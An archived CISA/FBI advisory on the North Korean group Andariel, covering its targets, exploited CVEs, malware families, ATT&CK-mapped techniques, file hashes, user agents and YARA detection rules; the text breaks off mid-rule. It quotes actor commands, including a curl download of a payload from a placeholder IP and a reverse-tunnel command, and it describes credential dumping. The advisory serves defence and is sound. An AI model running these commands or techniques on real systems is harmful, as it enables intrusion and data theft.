{ "id": "c6ff3f3b-f638-4d98-83d2-a1a7cd88be4d", "created_at": "2026-04-06T00:21:29.994425Z", "updated_at": "2026-04-10T13:11:34.336449Z", "deleted_at": null, "sha1_hash": "efa6aec67591c9eadc36060479de75e1d3c90321", "title": "North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs | CISA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 270496, "plain_text": "North Korea Cyber Group Conducts Global Espionage Campaign\r\nto Advance Regime’s Military and Nuclear Programs | CISA\r\nPublished: 2024-07-25 · Archived: 2026-04-05 16:09:15 UTC\r\nThe U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this\r\nCybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of\r\nKorea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau based in Pyongyang and Sinuiju:\r\nThe RGB 3rd Bureau includes a DPRK (aka North Korean) state-sponsored cyber group known publicly as\r\nAndariel , Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The\r\ngroup primarily targets defense, aerospace, nuclear, and engineering entities to obtain sensitive and classified\r\ntechnical information and intellectual property to advance the regime’s military and nuclear programs and\r\nambitions. The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various\r\nindustry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan\r\nand India. RGB 3rd Bureau actors fund their espionage activity through ransomware operations against U.S.\r\nhealthcare entities.\r\nThe actors gain initial access through widespread exploitation of web servers through known vulnerabilities in\r\nsoftware, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further\r\nexploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence\r\nusing Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as\r\nMimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source\r\ntooling for execution, lateral movement, and data exfiltration. \r\nThe actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut\r\nFile (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.\r\nThe authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a\r\ntimely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen\r\nauthentication and remote access protections. While not exclusive, entities involved in or associated with the\r\nbelow industries and fields should remain vigilant in defending their networks from North Korea state-sponsored\r\ncyber operations:\r\nAndariel (also known as Onyx Sleet , formerly PLUTONIUM, DarkSeoul, Silent Chollima, and\r\nStonefly/Clasiopa) is a North Korean state-sponsored cyber group, under the RGB 3rd Bureau, based in\r\nPyongyang and Sinuiju. The authoring agencies assess the group has evolved from conducting destructive attacks\r\ntargeting U.S. and South Korean organizations to conducting specialized cyber espionage and ransomware\r\noperations.\r\nThe actors currently target sensitive military information and intellectual property of defense, aerospace, nuclear,\r\nengineering organizations. To a lesser extent, the group targets medical and energy industries. See Table 1 for\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 1 of 31\n\nmore victimology information.\r\nTable 1. Andariel Cyber Espionage Victimology\r\nIndustry  Information Targeted\r\nDefense\r\nHeavy and light tanks and self-propelled howitzers\r\nLight strike vehicles and ammunition supply vehicles\r\nLittoral combat ships and combatant craft\r\nSubmarines, torpedoes, unmanned underwater vehicles (UUVs), and autonomous\r\nunderwater vehicles (AUVs)\r\nModeling and simulation services\r\nAerospace\r\nFighter aircraft and unmanned aerial vehicles (UAVs)\r\nMissiles and missile defense systems\r\nSatellites, satellite communications, and nano-satellite technology\r\nSurveillance radar, phased-array radar, and other radar systems\r\nNuclear\r\nUranium processing and enrichment\r\nMaterial waste and storage\r\nNuclear power plants\r\nGovernment nuclear facilities and research institutes\r\nEngineering\r\nShipbuilding and marine engineering\r\nRobot machinery and mechanical arms\r\nAdditive manufacturing and 3D printing components and technology\r\nCasting, fabrication, high-heat metal molding, and rubber and plastic molding\r\nMachining processes and technology\r\nThe information targeted—such as contract specifications, bills of materials, project details, design drawings, and\r\nengineering documents—has military and civilian applications and leads the authoring agencies to assess one of\r\nthe group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense\r\nprograms.\r\nRansomware\r\nAndariel actors fund their espionage activity through ransomware operations against U.S. healthcare entities, and\r\nin some instances, the authoring agencies have observed the actors launching ransomware attacks and conducting\r\ncyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same\r\nentity. For more information on this ransomware activity, see joint advisories #StopRansomware: Ransomware\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 2 of 31\n\nAttacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities and North Korean State-Sponsored\r\nCyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.\r\nMalicious Cyber Espionage Activity\r\nThis advisory uses the MITRE ATT\u0026CK for Enterprise framework, version 15. See the Appendix: MITRE\r\nATT\u0026CK Techniques for all referenced tactics and techniques.\r\nReconnaissance and Enumeration\r\nWhile there is limited available information on the group’s initial reconnaissance methods, the actors likely\r\nidentify vulnerable systems using publicly available internet scanning tools that reveal information such as\r\nvulnerabilities in public-facing web servers [T1595 , T1592 ]. The actors gather open source information about\r\ntheir victims for use in targeting [T1591 ] and research Common Vulnerabilities and Exposures (CVEs) when\r\npublished to the National Institute of Standards and Technology (NIST) National Vulnerability Database [T1596\r\n]. CVEs researched include:\r\nCVE-2023-46604 – Apache ActiveMQ\r\nCVE-2023-42793 – TeamCity\r\nCVE-2023-3519 – Citrix NetScaler\r\nCVE-2023-35078 – Ivanti Endpoint Manager Mobile (EPMM)\r\nCVE-2023-34362 – MOVEIt\r\nCVE-2023-33246 – RocketMQ\r\nCVE-2023-32784 – KeePass\r\nCVE-2023-32315 – Openfire\r\nCVE-2023-3079 – Google Chromium V8 Type Confusion\r\nCVE-2023-28771 and CVE-2023-33010 – Zyxell firmware\r\nCVE-2023-2868 – Barracuda Email Security Gateway\r\nCVE-2023-27997 – FortiGate SSL VPN\r\nCVE-2023-25690 – Apache HTTP Server\r\nCVE-2023-21932 – Oracle Hospitality Opera 5\r\nCVE-2023-0669 – GoAnywhere MFT\r\nCVE-2022-47966 – ManageEngine\r\nCVE-2022-41352 and CVE-2022-27925 – Zimbra Collaboration Suite\r\nCVE-2022-30190 – Microsoft Windows Support Diagnostic Tool\r\nCVE-2022-25064 – TP-LINK\r\nCVE-2022-24990 and CVE-2021-45837 – TerraMaster NAS\r\nCVE-2022-24785 – Moment.js\r\nCVE-2022-24665, CVE-2022-24664, and CVE-2022-24663 – PHP Everywhere\r\nCVE-2022-22965 – Spring4Shell\r\nCVE-2022-22947 – Spring Cloud Gateway\r\nCVE-2022-22005 – Microsoft SharePoint Server\r\nCVE-2022-21882 – Win32k Elevation of Privilege\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 3 of 31\n\nCVE-2021-44228 – Apache Log4j\r\nCVE-2021-44142 – Samba vfs_fruit module\r\nCVE-2021-43226, CEV-2021-43207, CVE-2021-36955 – Windows log file vulnerabilities\r\nCVE-2021-41773 – Apache HTTP Server 2.4.49\r\nCVE-2021-40684 – Talend ESB Runtime\r\nCVE-2021-3018 – IPeakCMS 3.5\r\nCVE-2021-20038 – SMA100 Apache httpd server (SonicWall)\r\nCVE-2021-20028 – SonicWall Secure Remote Access (SRA)\r\nCVE-2019-15637 – Tableau\r\nCVE-2019-7609 – Kibana\r\nCVE-2019-0708 – Microsoft Remote Desktop Services\r\nCVE-2017-4946 – VMware V4H and V4PA\r\nResource Development, Tooling, and Remote Access Tools\r\nThe actors leverage custom tools and malware for discovery and execution. Over the last 15 years, the group has\r\ndeveloped RATs, including the following, to permit remote access and manipulation of systems and lateral\r\nmovement.\r\nAtharvan\r\nELF Backdoor\r\nJupiter\r\nMagicRAT\r\n“No Pineapple”\r\nTigerRAT\r\nValefor/VSingle\r\nValidAlpha\r\nYamaBot\r\nNukeSped\r\nGoat RAT\r\nBlack RAT\r\nAndarLoader\r\nDurianBeacon\r\nTrifaux\r\nKaosRAT\r\nPreft\r\nAndariel Scheduled Task Malware\r\nBottomLoader (see Cisco Talos blog Operation Blacksmith)\r\nNineRAT (see Cisco Talos blog Operation Blacksmith)\r\nDLang (see Cisco Talos blog Operation Blacksmith)\r\nNestdoor (see AhnLab blog)\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 4 of 31\n\nThese tools include functionality for executing arbitrary commands, keylogging, screenshots, listing files and\r\ndirectories, browser history retrieval, process snooping, creating and writing to files, capturing network\r\nconnections, and uploading content to command and control (C2) [T1587.001 , T1587.004 ]. The tools allow\r\nthe actors to maintain access to the victim system with each implant having a designated C2 node.\r\nCommodity Malware and Dual-Use Applications\r\nCommodity malware is malicious software widely available for purchase or use and is leveraged by numerous\r\ndifferent threat actors. Dual-use applications are software tools widely available for purchase or use that are\r\ncommonly utilized by administrators and users for system administration or other legitimate purposes and also by\r\nthreat actors for malicious activities. These dual-use applications may reside locally, known as Living Off the\r\nLand (LOTL) tools, or be transferred to the target system during the attack. The use of publicly available malware\r\nand dual-use applications. The use of publicly available malware  and dual-use applications enables the actors to\r\nconceal and obfuscate their identities and leads to attribution problems. The authoring agencies are reliant on the\r\nuse of custom malware and loaders, along with overlapping C2 nodes to attribute commodity malware to the\r\nactors. The actors have at times achieved great success obfuscating their identities by leveraging open source\r\nmalware. The authoring agencies have identified the following open-source and dual-use tools as used and/or\r\ncustomized by the actors:\r\n3Proxy [T1090 ]\r\nAdFind [S0552 ]\r\nAsyncRAT\r\nDeimosC2\r\nImpacket [T1090 ]\r\nJuggernaut [T1040 ]\r\nLilith RAT\r\nORVX Web Shell\r\nMimikatz [S0002 ]\r\nPLINK [T1572 ]\r\nProcDump [T1003 ]\r\nPuTTY [T1572 ]\r\nSOCKS5 [T1090 ]\r\nStunnel [T1572 ]\r\nWeb Shell by Orb (WSO)\r\nWinRAR [T1560 ]\r\nWinSCP [T1048 ]\r\nRDP Wrapper [T1572 ]\r\nInitial Access\r\nThe actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such\r\nas CVE-2021-44228 (“Log4Shell”) in Apache’s Log4j software library and other CVEs listed above, to deploy\r\nweb shells and gain access to sensitive information and applications for further exploitation. The actors continue\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 5 of 31\n\nto breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted\r\nwidespread activity against a number of different organizations simultaneously [T1190 ].\r\nExecution\r\nThe actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL).\r\nThey use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC),\r\nand Linux bash, for system, network, and account enumeration. While individual commands typically vary, the\r\nauthoring agencies assess the actors prefer netstat commands, such as netstat –naop and netstat –noa\r\n[T1059 ]. Example commands used by the actors include the following:\r\nnetstat –naop\r\nnetstat –noa\r\npvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] \u003cRemote_IP\u003e\r\ncurl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:\\users\\public\\notify[.]exe\r\nC:\\windows\\system32\\cmd.exe /c systeminfo | findstr Logon\r\nThese actors often make typos and other mistakes, indicating that the commands are not directly copied from a\r\nplaybook and the actors have a flexible and impromptu approach. The typos also illustrate a poor grasp of the\r\nEnglish language, including common errors such as “Microsoft Cooperation” (rather than “Microsoft\r\nCorporation”) found across numerous RGB 3rd Bureau malware samples.\r\nDefense Evasion\r\nThe actors routinely pack late-stage tooling in VMProtect and Themida. Malicious tooling packed with these and\r\nother commercial tools have advanced anti-debugging and detection capabilities. These files are typically multiple\r\nmegabytes in size and often contain unusual file section names such as vmp0 and vmp1 for VMProtect and\r\nThemida or randomized file section names for Themida [T1027 ].\r\nCredential Access\r\nThe actors employ a multi-pronged approach to stealing credentials to gain additional access to systems, including\r\nthe use of publicly available credential theft utilities and dual-use tools such as Mimikatz, Dumpert, and\r\nProcDump, and accessing the Active Directory domain database through targeting of the NTDS.dit file. The\r\nauthoring agencies assess the actors change settings on compromised systems to force the system to store\r\ncredentials and then use the aforementioned tools to steal credentials. In one instance, the actors used the\r\nvssadmin command-line utility to back up a volume to retrieve a copy of the NTDS.dit file containing Active\r\nDirectory data. In another instance, the actors were observed collecting registry hive data for offline extraction of\r\ncredentials [T1003 ].\r\nDiscovery\r\nThe actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and\r\nexecuting command line arguments to enumerate directories and files and compress output files. The tool collects\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 6 of 31\n\nthe following information for each drive targeted on a system: depth relative to starting path, name, last write\r\ntime, last access time, creation time, size, and attributes [T1087 , T1083 ]. \r\nThe actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol,\r\nwhich enables network file sharing and the ability to request services and programs from a network [T1021.002\r\n].\r\nLateral Movement\r\nThe actors also use system logging for discovery to move laterally. The group logs active window changes,\r\nclipboard data, and keystrokes and saves the collected logging information to the %Temp% directory.\r\nThe actors have also used Remote Desktop Protocol (RDP) to move laterally [T1021 ].\r\nCommand and Control\r\nThe actors leverage techniques and infrastructure positioned around the world to send commands to compromised\r\nsystems. The actors disguise their malware within HTTP packets to appear as benign network traffic. They also\r\nuse tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic\r\nover a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2\r\noperations despite network configurations that would typically pose a challenge, such as the use of Network\r\nAddress Translation (NAT) or traffic funneled through a web proxy [T1090 , T1071 ].\r\nCollection and Exfiltration\r\nMalware previously used by the actors permitted placement and access to search through files that could be of\r\ninterest, including scanning computer files for keywords related to defense and military sectors in English and\r\nKorean. The actors identify data for theft by enumerating files and folders across many directories and servers\r\nusing command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR\r\narchives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious\r\ntooling [T1560 , T1039 ].\r\nThe actors typically exfiltrate data to web services such as cloud storage or servers not associated with their\r\nprimary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service\r\naccounts directly from victim networks to exfiltrate data [T1567 ]. The actors have also been observed using the\r\nutilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP)\r\nand other protocols [T1048 ].\r\nThe actors have also been identified staging files for exfiltration on victim machines, establishing Remote\r\nDesktop Protocol connections, and conducting HTTP GET requests on port 80 to receive information [T1021 ].\r\nIndicators of Compromise\r\nSee below for Andariel IOCs.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 7 of 31\n\nThe following include observed MD5 hashes:\r\n88a7c84ac7f7ed310b5ee791ec8bd6c5\r\n6ab4eb4c23c9e419fbba85884ea141f4\r\n97ce00c7ef1f7d98b48291d73d900181\r\n079b4588eaa99a1e802adf5e0b26d8aa\r\n0873b5744d8ab6e3fe7c9754cf7761a3\r\n0d696d27bae69a62def82e308d28857a\r\n0ecf4bac2b070cf40f0b17e18ce312e6\r\n17c46ed7b80c2e4dbea6d0e88ea0827c\r\n1f2410c3c25dadf9e0943cd634558800\r\n2968c20a07cfc97a167aa3dd54124cda\r\n33e85d0f3ef2020cdb0fc3c8d80e8e69\r\n4118d9adce7350c3eedeb056a3335346\r\n4aa57e1c66c2e01f2da3f106ed2303fa\r\n58ad3103295afcc22bde8d81e77c282f\r\n5c41cbf8a7620e10f158f6b70963d1cb\r\n61a949553d35f31957db6442f36730c5\r\n72a22afde3f820422cfdbba7a4cbabde\r\n84bd45e223b018e67e4662c057f2c47e\r\n86465d92f0d690b62866f52f5283b9fc\r\n8b395cc6ecdec0900facf6e93ec48fbb\r\n97f352e2808c78eef9b31c758ca13032\r\na50f3b7aa11b977ae89285b60968aa67\r\nafd25ce56b9808c5ed7eade75d2e12a7\r\nafdeb24975a318fc5f20d9e61422a308\r\nb697b81b341692a0b137b2c748310ea7\r\nbcac28919fa33704a01d7a9e5e3ddf3f\r\nc027d641c4c1e9d9ad048cda2af85db6\r\nc892c60817e6399f939987bd2bf5dee0\r\ncdeae978f3293f4e783761bc61b34810\r\nd0f310c99476f1712ac082f78dd29fdc\r\nd8da33fae924b991b776797ba8cde24c\r\ne230c5728f9ea5a94e390e7da7bf1ffa\r\nf4d46629ca15313b94992f3798718df7\r\nfb84a392601fc19aeb7f8ce11b3a4907\r\nff3194d3d5810a42858f3e22c91500b1\r\n13b4ce1fc26d400d34ede460a8530d93\r\n41895c5416fdc82f7e0babc6bb6c7216\r\nc2f8c9bb7df688d0a7030a96314bb493\r\n33a3da2de78418b89a603e28a1e8852c\r\n4896da30a745079cd6265b6332886d45\r\n73eb2f4f101aab6158c615094f7a632a\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 8 of 31\n\n7f33d2d2a2ce9c195202acb59de31eee\r\ne1afd01400ef405e46091e8ef10c721c\r\nfe25c192875ec1914b8880ea3896cda2\r\n232586f8cfe82b80fd0dfa6ed8795c56\r\nc1f266f7ec886278f030e7d7cd4e9131\r\n49bb2ad67a8c5dfbfe8db2169e6fa46e\r\nbeb199b15bd075996fa8d6a0ed554ca8\r\n4053ca3e37ed1f8d37b29eed61c2e729\r\n3a0c8ae783116c1840740417c4fbe678\r\n0414a2ab718d44bf6f7103cff287b312\r\nca564428a29faf1a613f35d9fa36313f\r\nad6d4eb34d29e350f96dc8df6d8a092e\r\ndc70dc9845aa747001ebf2a02467c203\r\n3d2ec58f37c8176e0dbcc47ff93e5a76\r\n0a09b7f2317b3d5f057180be6b6d0755\r\n1ffccc23fef2964e9b1747098c19d956\r\n9112efb49cae021abebd3e9a564e6ca4\r\nac0ada011f1544aa3a1cf27a26f2e288\r\n0211a3160cc5871cbcd4e5514449162b\r\n7416ea48102e2715c87edd49ddbd1526\r\na2aefb7ab6c644aa8eeb482e27b2dbc4\r\ne7fd7f48fbf5635a04e302af50dfb651\r\n33b2b5b7c830c34c688cf6ced287e5be\r\ne5410abaaac69c88db84ab3d0e9485ac\r\neb35b75369805e7a6371577b1d2c4531\r\n5a3f3f75048b9cec177838fb8b40b945\r\n9d7bd0caed10cc002670faff7ca130f5\r\n8434cdd34425916be234b19f933ad7ea\r\nbbaee4fe73ccff1097d635422fdc0483\r\n79e474e056b4798e0a3e7c60dd67fd28\r\n95c276215dcc1bd7606c0cb2be06bf70\r\n426bb55531e8e3055c942a1a035e46b9\r\ncfae52529468034dbbb40c9a985fa504\r\ndeae4be61c90ad6d499f5bdac5dad242\r\nbda0686d02a8b7685adf937cbcd35f46\r\n6de6c27ca8f4e00f0b3e8ff5185a59d1\r\nc61a8c4f6f6870c7ca0013e084b893d2\r\n5291aed100cc48415636c4875592f70c\r\nf4795f7aec4389c8323f7f40b50ae46f\r\ncf1a90e458966bcba8286d46d6ab052c\r\n792370eb01e16ac3dc511143932d0e1d\r\n612538328e0c4f3e445fb58ef811336a\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 9 of 31\n\n9767aa592ec2d6ae3c7d40b6049d0466\r\nb22fd0604c4f189f2b7a59c8f48882dd\r\ne53ca714787a86c13f07942a56d64efa\r\nc7b09f1dd0a5694de677f3ecceda41b7\r\nc8346b39418f92725719f364068a218d\r\n730bff14e80ffd7737a97cdf11362ab5\r\n9a481bc83fea1dea3e3bdfff5e154d44\r\nddb1f970371fa32faae61fc5b8423d4b\r\n6c2b947921e7c77d9af62ce9a3ed7621\r\n977d30b261f64cc582b48960909d0a89\r\n7ce51b56a6b0f8f78056ddfc5b5de67c\r\ndd9625be4a1201c6dfb205c12cf3a381\r\necb4a09618e2aba77ea37bd011d7d7f7\r\n0fd8c6f56c52c21c061a94e5765b27b4\r\nc90d094a8fbeaa8a0083c7372bfc1897\r\n0055a266aa536b2fdadb3336ef8d4fba\r\n55bb271bbbf19108fec73d224c9b4218\r\n0c046a2f5304ed8d768795a49b99d6e4\r\nf34664e0d9a10974da117c1ca859dba8\r\na2c2099d503fcc29478205f5aef0283b\r\ne439f850aa8ead560c99a8d93e472225\r\n7c30ed6a612a1fd252565300c03c7523\r\n81738405a7783c09906da5c7212e606b\r\nc027d641c4c1e9d9ad048cda2af85db6\r\neb7ba9f7424dffdb7d695b00007a3c6d\r\n3e9ee5982e3054dc76d3ba5cc88ae3de\r\n073e3170a8e7537ff985ec8316319351\r\n9b0e7c460a80f740d455a7521f0eada1\r\n2d02f5499d35a8dffb4c8bc0b7fec5c2\r\n0984954526232f7d05910aa5b07c5893\r\n4156a7283284ece739e1bae05f99e17c\r\n3026d419ee140f3c6acd5bff54132795\r\n7aa132c0cc63a38fb4d1789553266fc7\r\n1a0811472fad0ff507a92c957542fffd\r\nf8aef59d0c5afe8df31e11a1984fbc0a\r\n82491b42b9a2d34b13137e36784a67d7\r\n0a199944f757d5615164e8808a3c712a\r\n9c97ea18da290a6833a1d36e2d419efc\r\n16f768eac33f79775a9672018e0d64f5\r\nThe following include observed SHA-256 hashes:\r\ned8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 10 of 31\n\ndb6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984\r\n773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df\r\n05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d\r\ne3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe\r\n1962ebb7bf8d2b306c6f3b55c3dcd69a755eeff1a17577b7606894b781841c3a\r\nf226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb\r\n6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1\r\nb7435d23769e79fcbe69b28df4aef062685d1a631892c2354f96d833eae467be\r\n66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66\r\ndef2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563\r\n323cbe7a3d050230cfaa822c2a22160b4f8c5fe65481dd329841ee2754b522d9\r\n74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643\r\n1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f\r\n8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5\r\nc2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f\r\ndda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469\r\n90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4\r\n452ca47230afd4bb85c45af54fcacbfa544208ef8b4604c3c5caefe3a64dcc19\r\n199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1\r\n2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc\r\nce779e30502ecee991260fd342cc0d7d5f73d1a070395b4120b8d300ad11d694\r\ndb6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984\r\nc28bb61de4a6ad1c5e225ad9ec2eaf4a6c8ccfff40cf45a640499c0adb0d8740\r\n34d5a5d8bec893519f204b573c33d54537b093c52df01b3d8c518af08ee94947\r\n664f8d19af3400a325998b332343a9304f03bab9738ddab1530869eff13dae54\r\n772b06f34facf6a2ce351b8679ff957cf601ef3ad29645935cb050b4184c8d51\r\naa29bf4292b68d197f4d8ca026b97ec7785796edcb644db625a8f8b66733ab54\r\n9a5504dcfb7e664259bfa58c46cfd33e554225daf1cedea2ec2a9d83bbbfe238\r\nc2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c\r\n8aa6612c95c7cef49709596da43a0f8354f14d8c08128c4cb9b1f37e548f083b\r\n38f0f2d658e09c57fc78698482f2f638843eb53412d860fb3a99bb6f51025b07\r\nThe following include a list of user agent strings used by the actors:\r\nMozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\r\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0\r\nMozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\r\nMozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110\r\nSafari/537.36 SE 2.X MetaSr 1.0\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/68.0.3440.106 Safari/537.36\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 11 of 31\n\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\r\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nMozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\r\nDetection Methods\r\nSee Table 2 for YARA rules, created by the FBI, authoring partners, and private industry, that can be used to detect\r\nmalware used by the actors.\r\nTable 2. YARA Rules\r\nrule Andariel_ScheduledTask_Loader\r\n{\r\n    strings:\r\n        $obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00\r\n00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66\r\n89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00\r\n48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C\r\n04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 }\r\n                             $obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20\r\n9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00\r\n48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 }\r\n                             $obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20\r\n9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00\r\n48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6\r\n44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01\r\n00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 }\r\n    condition:\r\n        uint16(0) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3\r\n}\r\nrule Andariel_KaosRAT_Yamabot\r\n{\r\n    strings:\r\n        $str1 = \"/kaos/\"\r\n        $str2 = \"Abstand [\"\r\n        $str3 = \"] anwenden\"\r\n        $str4 = \"cmVjYXB0Y2hh\"\r\n        $str5 = \"/bin/sh\"\r\n        $str6 = \"utilities.CIpaddress\"\r\n        $str7 = \"engine.NewEgg\"\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 12 of 31\n\n$str8 = \"%s%04x%s%s%s\"\r\n        $str9 = \"Y2FwdGNoYV9zZXNzaW9u\"\r\n        $str10 = \"utilities.EierKochen\"\r\n        $str11 = \"kandidatKaufhaus\"\r\n    condition:\r\n        3 of them\r\n}\r\nrule TriFaux_EasyRAT_JUPITER\r\n{\r\n    strings:\r\n        $InitOnce = \"InitOnceExecuteOnce\"\r\n        $BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D\r\n00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D\r\n00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A }\r\n                             $Bytes =\r\n\"4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,\" wide\r\n    condition:\r\n        uint16(0) == 0x5a4d and all of them\r\n}\r\nrule Andariel_CutieDrop_MagicRAT\r\n{\r\n              strings:\r\n                             $config_os_w = \"os/windows\" ascii wide\r\n                             $config_os_l = \"os/linux\" ascii wide\r\n                             $config_os_m = \"os/mac\" ascii wide\r\n                             $config_comp_msft = \"company/microsoft\" ascii wide\r\n                             $config_comp_orcl = \"company/oracle\" ascii wide\r\n                             $POST_field_1 = \"session=\" ascii wide\r\n                             $POST_field_2 = \"type=\" ascii 